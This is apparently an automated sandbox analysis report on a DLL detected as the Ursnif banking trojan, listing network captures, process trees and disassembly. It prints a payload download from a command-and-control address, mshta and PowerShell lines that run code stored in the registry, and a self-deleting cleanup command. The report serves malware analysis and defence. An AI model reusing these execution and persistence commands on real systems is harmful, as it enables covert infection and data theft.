c5 24 98 bc 1e 8d d0 32 3a be ba 5b cc 59 71 10 19 db f1 27 b4 18 19 51 81 c9 dc 2a 68 da d5 ca 34 87 4e 78 63 94 78 3a e6 ce 53 d9 88 10 f3 a7 80 63 78 a7 38 76 d7 18 61 67 78 00 29 51 09 8f 4c 89 4b ca 92 9c 13 7e 59 39 a0 51 aa fa d1 03 3b 4a 5f 67 d0 85 63 ea 30 6f 0d e8 09 ae 34 e7 8a 90 d9 95 4b fd 26 05 fb 0e 7c 02 b0 0c f9 67 df 98 0f 79 8c 6d ff 0c e7 be 6a b7 12 29 4d 0b 62 99 8f 98 67 62 02 8d b2 49 94 fa b5 be b0 ec 6a 9a af d8 30 7c aa 3f 85 d3 66 54 02 99 b6 98 bd be ce 73 8d 03 3f fe 89 4f 99 33 c1 d3 c5 bf fa 8b fb
                                          Data Ascii: Tg52 {@^Jb~NJa"f`Z2(~W>@pzh}*dwmLp3VXt" {{eQGPe#CHH+2W:xkkVvDr.}"l)[dsbE>`> jzYK&NzQAn[K!]z KQM/~t-VDW(czGMLrE"Pl'|/]|3`0tt,Fk<7#SA'od2Q-xh'"Zg8DU.f>i9]EGr_4lQykrn)J=eqy0f9_,[XE;Z\pCimK!_u#gvyQS1+Agy%buzZLhKf1+W"CHQ'V9pcQ)<Y4'a{D@^g!UCv(G!s"'MGp-Bmew)k:|PW4t*,E]-G6^\`[{:;7WrQ}[VX]0g8?KmH_m$2:[Yq'Q*h4Nxcx:Scx8vagx)QLK~Y9Q;J_gc0o4K&|gymj)MbgbIj0|?fTs?O3
                                          Apr 23, 2022 08:12:21.823791981 CEST1716OUTGET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                          Host: 146.70.35.138
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Apr 23, 2022 08:12:22.199361086 CEST1717INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0 (Ubuntu)
                                          Date: Sat, 23 Apr 2022 06:12:22 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 1869
                                          Connection: keep-alive
                                          Pragma: public
                                          Accept-Ranges: bytes
                                          Expires: 0
                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                          Content-Disposition: inline; filename="626398c6264cb.bin"
                                          Data Raw: 40 d1 e5 5a 8b c7 b4 20 04 1d ee a2 24 f1 96 9d 26 a1 0b 1b 7e e3 4e 1f 5d 3c 4d da 10 7c 95 81 0f 16 f7 ee 7d fb 39 8c 70 71 45 d9 0f ab ad 60 01 a5 32 5d be 0d 61 0e 50 82 f8 65 5b 9a 22 17 77 7e df 1d d3 e9 2a 08 c4 85 a2 d9 7c 2f 82 76 1f a1 0c 49 88 f8 0e c9 2d a0 8a 50 56 c2 c7 92 94 e2 ec 7e 79 4a 65 9b 26 e4 dd 72 cc a9 e7 63 18 5b ca dd df b9 3c ff 59 43 c8 9c c3 1a 12 d9 00 09 54 eb 65 b3 47 f4 68 0c b2 8f b5 20 fb 61 ad f0 29 d6 ef 6f ad 1f 9b 0f 56 f2 39 7e b4 2e 17 15 94 17 47 de 21 36 e1 25 3a 1c 1e 8d 36 93 c2 c8 4e 60 10 93 49 cd cf 19 4f 0c 1f a5 d3 5d df 25 13 ca 40 20 64 fe 4b 27 eb fb 5b ce 56 73 77 b6 d4 6f 61 c2 6b 4e fe cb 73 77 22 e9 f6 1d 48 0c 2e 7a d7 73 4c e6 51 80 cb f5 e3 20 5b 24 a3 68 83 38 6a 87 1d d6 fc d3 cf f2 a2 a3 35 f3 19 e8 ac 2c e4 cb 70 a5 b0 92 e2 87 00 7b 31 2a 0d 22 de b4 1e 6d 5d 7c 13 90 ef 11 74 34 aa 7e 6b 92 3a e5 d5 5c be 59 0b ec ab 8a db cf 67 a8 2b 63 24 50 a1 20 ed 30 f3 e8 e0 28 6b 51 f4 5e e9 8f c2 69 d8 28 69 51 46 a7 72 50 9d 2a 97 f7 91 81 7c 6c 5a d0 ba ac bd 1c d8 97 9e 7f 2d 30 0e 8b 0a c6 f9 a4 b5 dc 66 f3 19 b7 79 89 51 9b eb 95 fa e6 32 f7 db 83 04 be d0 a4 34 40 10 7b e0 ea 75 18 6e 32 43 93 ff ec 97 e9 13 de b1 39 90 ae fd b1 88 f6 eb a8 a3 5f d3 40 f2 8a c8 1a b5 da 23 07 28 14 d4 48 91 e4 75 6c 2e 2f 59 14 ed cd 56 33 a4 6f 3c 74 70 51 26 d2 f1 00 9d c7 9e 68 ca 93 01 b0 18 8b 9c 3a 19 27 47 cf c7 cc f2 d1 42 aa e5 ce 1f 0f 07 03 9a 24 72 37 bc 30 c3 42 3d 57 49 09 18 78 26 bc 66 1e 36 de 2a c7 72 0d 10 ee fa 93 05 a5 63 7e 1c e1 d8 c6 71 0e 0f 77 91 6d aa 79 b3 3a 27 fe 2e 3b 53 ad 84 37 f4 45 54 52 da 80 67 3c 9c 44 86 2a a7 58 26 94 83 b1 bd ca d7 ad 1d 43 f8 70 2b 43 d2 05 fd d2 bd 6b 6f 62 28 7b 75 60 c4 14 07 07 2c f7 3e f3 95 1f 56 90 0c 06 3e 6c 02 6c 89 e1 6c 0b cb a0 a3 9c ba 25 72 e8 31 27 75 22 9d 20 f7 46 af 10 5d c0 d6 ec 16 ab 36 03 82 9f fb a2 ca 77 e2 f1 69 ad fe a5 b9 2c 1b 4a e3 1d 69 43 fc 81 b7 22 57 f1 2c fa 72 4d 17 49 56 ad 1f ff 4a a5 38 50 c9 b2 68 b3 c4 e2 33 e0 9b 81 eb 69 56 89 c3 9b 32 9c 57 30 ee 5d 75 8b e2 b2 d7 ee fb a8 48 a0 5e f2 34 a7 15 38 ac ae 28 2c 60 6f 00 b8 12 2b bf 5a 7d fc 9d 1c f0 1a dd a6 92 7f f1 c5 f3 02 e2 83 f6 a1 52 db f7 14 b9 38 35 28 e6 2b 62 1a 3f b8 e0 b5 43 ea a8 92 b6 60 5b 95 b3 d5 09 19 61 54 a7 f6 67 69 2b 6d 9e 93 4e 6a 56 d6 3f 53 09 df 02 18 fe f4 5e 79 48 1e 9b 82 dc cf fb 80 f3 bb 65 a6 56 0e 5a e8 78 a7 13 70 ac ce cc c9 43 75 3c f7 ef 58 23 f8 c7 88 e3 17 85 ca 17 bb 6e 86 b2 4d 6f 8a da 5c 1b 90 9a d2 4d 26 35 99 bb 8b 29 ea 31 7b 6b 5f b9 0e 00 3a a4 e4 ea 72 09 48 da 0c d2 ae 7f 25 91 ec 37 59 6e 37 a1 80 7c 8e 19 d1 1d 3a ee dc 6d 6a 4c 0b 42 b6 2b 61 83 0b d7 d9 f5 f6 ce 72 f7 b5 90 05 e5 3f 8a 59 21 da ac 86 48 37 1f 98 8f 3a 7e a8 72 fb a7 30 f0 f0 02 05 b3 ae ea dd 01 b1 44 fd d2 ee a8 d7 98 54 14 92 eb 8f 4e 62 a3 f2 7e 80 f8 92 9d 71 a2 ed 5c 8a 7c f2 dd 5c 75 7c 65 29 cd 7c e2 5d aa 2d f2 1d f5 f7 ab 93 ec 3b 66 10 48 80 13 8e 53 aa 6d ca d6 5e d2 47 e2 a0 4b fe ca fd 03 fd fa 45 3e c5 74
                                          Data Ascii: @Z $&~N]<M|}9pqE`2]aPe["w~*|/vI-PV~yJe&rc[<YCTeGh a)oV9~.G!6%:6N`IO]%@ dK'[VswoakNsw"H.zsLQ [$h8j5,p{1*"m]|t4~k:\Yg+c$P 0(kQ^i(iQFrP*|lZ-0fyQ24@{un2C9_@#(Hul./YV3o<tpQ&h:'GB$r70B=WIx&f6*rc~qwmy:'.;S7ETRg<D*X&Cp+Ckob({u`,>V>lll%r1'u" F]6wi,JiC"W,rMIVJ8Ph3iV2W0]uH^48(,`o+Z}R85(+b?C`[aTgi+mNjV?S^yHeVZxpCu<X#nMo\M&5)1{k_:rH%7Yn7|:mjLB+ar?Y!H7:~r0DTNb~q\|\u|e)|]-;fHSm^GKE>t


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:08:11:50
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\loaddll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
                                          Imagebase:0x990000
                                          File size:116736 bytes
                                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:1
                                          Start time:08:11:51
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                                          Imagebase:0x1190000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:2
                                          Start time:08:11:51
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                                          Imagebase:0x270000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high

                                          General

                                          Target ID:4
                                          Start time:08:11:53
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                                          Imagebase:0x10e0000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:10
                                          Start time:08:12:02
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
                                          Imagebase:0x1220000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:14
                                          Start time:08:12:12
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                                          Imagebase:0x1220000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:23
                                          Start time:08:12:28
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\mshta.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                          Imagebase:0x7ff701c00000
                                          File size:14848 bytes
                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:24
                                          Start time:08:12:31
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                          Imagebase:0x7ff6ba650000
                                          File size:447488 bytes
                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high

                                          General

                                          Target ID:25
                                          Start time:08:12:31
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff647620000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:26
                                          Start time:08:12:38
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                                          Imagebase:0x7ff7979b0000
                                          File size:2739304 bytes
                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:moderate

                                          General

                                          Target ID:27
                                          Start time:08:12:40
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                                          Imagebase:0x7ff7871c0000
                                          File size:47280 bytes
                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Target ID:28
                                          Start time:08:12:43
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                                          Imagebase:0x7ff7979b0000
                                          File size:2739304 bytes
                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET

                                          General

                                          Target ID:29
                                          Start time:08:12:46
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                                          Imagebase:0x7ff7871c0000
                                          File size:47280 bytes
                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Target ID:30
                                          Start time:08:12:49
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\control.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\control.exe -h
                                          Imagebase:0x7ff61b590000
                                          File size:117760 bytes
                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Target ID:32
                                          Start time:08:12:52
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                          Imagebase:0x7ff7567e0000
                                          File size:69632 bytes
                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Target ID:33
                                          Start time:08:12:54
                                          Start date:23/04/2022
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6f3b00000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Target ID:37
                                          Start time:08:13:12
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                                          Imagebase:0x7ff7bb450000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Target ID:38
                                          Start time:08:13:12
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff647620000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Target ID:39
                                          Start time:08:13:13
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping localhost -n 5
                                          Imagebase:0x7ff69dae0000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:19.3%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 122 401700 GetNLSVersion 123 401731 122->123 124 401750 125 401764 124->125 126 401843 GetBinaryTypeW 125->126 127 40177c 125->127 126->127

                                            Callgraph

                                            Executed Functions

                                            Function 00401750 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 401750-401769 call 401078 3 40176b-40178f 0->3 4 40177c-401783 0->4 7 401791-401798 3->7 8 40176d-401778 3->8 6 4018b7-4018c1 4->6 7->6 8->7 9 40177a-40186f GetBinaryTypeW 8->9 13 401871-401878 9->13 14 401883-4018a3 9->14 13->6 15 4018a5-4018ac call 4010a0 14->15 16 40187a-401881 14->16 15->6 16->6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.297606650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.297601773.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297668473.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297673903.000000000042D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297679111.0000000000432000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297685986.0000000000435000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297732853.000000000043E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297738646.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297763429.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297768327.0000000000482000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297778983.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297784732.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297789238.0000000000498000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                            Similarity
                                            • API ID: BinaryType
                                            • String ID:
                                            • API String ID: 3726996659-0
                                            • Opcode ID: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                            • Instruction ID: 0eeef9b5ff0b6f189b2643ab8443012d5bbcf05fbf81118edcc849a7d612c21c
                                            • Opcode Fuzzy Hash: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                            • Instruction Fuzzy Hash: 5F310AB4D043188BDB24DF64C8847ADBBB0AF55304F6081FAD819672E1D3799AC6DB4A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401700 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 20 401700-40172c GetNLSVersion 21 401731-401736 20->21 22 401747-40174e 21->22 23 401738 21->23 24 40173f-401746 22->24 23->24
                                            C-Code - Quality: 37%
                                            			E00401700() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t7;
				intOrPtr _t9;
				intOrPtr* _t13;

				_t7 = _t13;
				 *((intOrPtr*)(_t7 + 8)) = 0;
				 *((intOrPtr*)(_t7 + 4)) = 0;
				 *_t7 = 0;
				_t9 =  *__imp__GetNLSVersion(); // executed
				_v12 = _t9;
				if(GetLastError() != 0x57) {
					_v8 = 1;
				} else {
					_v8 = 0;
				}
				return _v8;
			}








                                            0x00401706
                                            0x00401708
                                            0x0040170f
                                            0x00401716
                                            0x00401721
                                            0x0040172c
                                            0x00401736
                                            0x00401747
                                            0x00401738
                                            0x00401738
                                            0x00401738
                                            0x00401746

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.297606650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.297601773.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297668473.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297673903.000000000042D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297679111.0000000000432000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297685986.0000000000435000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297732853.000000000043E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297738646.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297763429.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297768327.0000000000482000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297778983.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297784732.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.297789238.0000000000498000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                            Similarity
                                            • API ID: Version
                                            • String ID:
                                            • API String ID: 1889659487-0
                                            • Opcode ID: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                            • Instruction ID: 3cf9f2388d101d325097f471fc7551e32da9b99bb7f36ef05aa09be99d1535a1
                                            • Opcode Fuzzy Hash: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                            • Instruction Fuzzy Hash: 14E04FB0914204DFDB00EFA8D95975E7BF0AB00308F1580F9D8085B3A1D379DE54EB9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            Function 0581312E Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
